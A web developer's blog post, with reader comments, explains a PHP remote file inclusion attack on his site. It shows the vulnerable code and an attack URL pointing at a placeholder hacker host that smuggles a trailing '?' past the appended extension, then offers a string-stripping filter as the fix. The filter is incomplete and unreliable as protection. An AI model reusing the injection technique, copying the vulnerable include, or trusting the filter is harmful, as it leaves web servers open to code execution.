Development Tips
Preventing URL Injection Attacks
Although I was supremely irritated that someone was hacking intermz and uploading malicious files (i.e. eBay phishing files, etc) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, what I will call a “URL injection” attack. (This differs from a SQL injection attack, which is another problem you should worry about. There is lots of good info on preventing SQL injection out there.) I am going to document how they did it here to hopefully help you web developers out there prevent this from happening to you.
First, let me briefly describe how the intermz site works. It follows a very simple “template/content” paradigm. Basically, I designed a single frame (template) that I load all other pages into (content) so that every page looks the same and if I need to make a change, I can just make it to the template and every page will reflect that change. I used a basic “page” parameter in my GET string to pass the name of the of .php file to load into the template. It works like this:
Example URL:
http://www.intermz.com/default.php?page=home
The PHP code takes the “page” parameter and:
$page = $_GET['page'];
Require($page . ‘.php’);
The jist of what the hackers did was they passed in a page parameter that was the URL of a PHP script of their own:
http://www.intermz.com/default.php?page=http://www.hackerserver123.com/maliciousCode.php?
(Note: I’ve replaced the actual hack-script URL with a dummy URL so no one will go out there and try to use it.)
What this allows them to do is run their script on my server, letting them upload and delete files on it without needing FTP access. (See screen shot below of what that looks like.) If you are a coder, you might have noticed that the Require() command above actually appends a “.php” to whatever page is passed in and that would have tried to load “…maliciousCode.php.php” which would have failed. But if you look closely, you will notice that the injected URL ends with a “?“. This is the very clever part. That means the “.php” that my Require() command appends to the URL will actually append as a perfectly legal (although unused) parameter.
So how do you stop this kind of attack?
Well, I built a filter to remove any part of the page parameter that might make it an outside URL:
$filter = array(’http://’, ‘www’, ‘.’);
$replace = array(”);
$page = str_ireplace($filter, $replace, $_GET['page']);
So far, this has stopped the hacks.
Hope this helps you guys!
Related posts:
Discussion
6 comments for “Preventing URL Injection Attacks”
Post a comment
Thanks for the article it came in handy.
I had something similar happening so was looking for a solution when I came accross your article.
A hacker had been using some sort of anonymous proxy script running dozens of times per day without me knowing. In effect the header and footer of my site showed but with a picture and link to a viagra sales page appearing in the middle. It was colour matched and everything!
In the end I used the preg_match function to watch for anyone using “http://” in the search string and if a match is found they now get a redirect back to the IP address of origin.
No sympathy here.
Glad this post was helpful (and thanks for letting me know so). It’s amazing how sophisticated these hackers are. You’d only wish they’d use their creativity in more productive ways.
That’s actually a very clever and valiant idea - kick their garbage back at them. I think I will implement your technique. Thanks for it.
I cruised your site priceranger.co.uk and would find it rather useful but for the fact that I’m in the US and shipping items like the new LCD flatscreen I have been craving would be cost prohibitive…I will, however, keep it in mind for smaller purchases.
All the best.
I’m not sure if it will succeed as you can’t always post snippets of code however if it does the code I used is below.
Guess not. Well, if you do post your code somewhere, let me know and I will link to it.
interesting site man
Thanks, Bob =)